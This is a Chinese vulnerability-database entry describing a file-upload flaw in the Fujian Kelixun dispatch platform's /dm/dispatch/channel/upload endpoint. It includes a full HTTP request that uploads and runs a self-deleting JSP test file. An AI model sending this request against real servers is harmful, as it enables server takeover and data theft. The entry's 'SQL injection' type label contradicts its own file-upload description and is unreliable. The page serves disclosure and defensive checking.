momo安全漏洞库

多模块数据检索平台

登录 注册
返回列表

福建科立讯通信指挥调度平台 /dm/dispatch/channel/upload 文件上传漏洞

CVE: CVE-2024-2622
CNVD: 暂无
CNNVD: 暂无
漏洞类型: SQL注入
漏洞等级: 高危
年份: 2026
POC_ID: 94531
漏洞描述
福建科立讯通信指挥调度平台是一款用于应急通信和指挥调度的专业软件系统。其 /dm/dispatch/channel/upload 接口在文件上传过程中,未对上传文件的类型、扩展名及内容进行充分的安全校验与过滤,导致攻击者可以上传包含恶意代码的JSP等WebShell文件。该漏洞可导致攻击者完全控制服务器,窃取敏感数据或作为进一步内网渗透的跳板,利用门槛低且危害极大,建议相关单位立即排查并修复此高危漏洞。 POST /dm/dispatch/channel/upload HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 268 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymktQ1NxGS3TKIY1T Accept-Encoding: gzip Connection: close ------WebKitFormBoundarymktQ1NxGS3TKIY1T Content-Disposition: form-data; name="file"; filename="a2CACC82.jsp" <% out.println("60BAEa0a"); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> ------WebKitFormBoundarymktQ1NxGS3TKIY1T--
影响范围
福建科立讯通信指挥调度平台
漏洞详情
登录后可查看漏洞详情。请先 登录注册
漏洞 POC
登录后可查看漏洞 POC。请先 登录注册
修复建议
暂无